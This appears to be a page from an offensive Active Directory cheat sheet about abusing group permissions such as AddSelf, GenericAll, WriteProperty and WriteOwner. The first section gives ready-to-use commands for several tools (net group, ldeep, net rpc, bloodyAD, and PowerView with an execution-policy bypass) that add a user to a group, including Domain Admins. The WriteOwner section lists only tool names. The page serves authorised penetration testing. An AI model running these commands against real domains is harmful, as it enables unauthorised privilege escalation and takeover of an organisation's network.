ACLs/ACEs permissions on Group
AddSelf (Self-Membership) on Group / GenericAll/WriteProperty on Group/ WriteProperty (Self-Membership)
1) Add group member
net group "GROUP" MY_USER /add /domain2) ldeep
ldeep ldap -u USER -p PASSWORD -d DOMAIN -s ldap://DC add_to_group "CN=USER,DC=DOMAIN" "CN=GROUP,DC=DOMAIN"3) Linux Net RPC - Samba
net rpc group addmem "GROUP" "USER" -U domain.local/USER%'Password@1' -S DC_IP4) BloodyAD
bloodyAD --host "DC_IP" -d "domain.local" -u "USER" -p "Password@1" add groupMember "GROUP" "USER"5) Powerview
powershell -ep bypass
Import-Module .PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password@1' -AsPlainText -Force
$Cred = New-Object
System.Management.Automation.PSCredential('domain.local\USER1', $SecPassword)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'USER1' -Credential
$Cred6) Ldap_shell
7) Active Directory Module
8) Addusertogroup python script
WriteOwner on Group
1) impacket-owneredit
2) impacket-dacledit
3) Linux Net RPC - Samba
4) BloodyAD
5) Powerview
6) Windows Net command
Last updated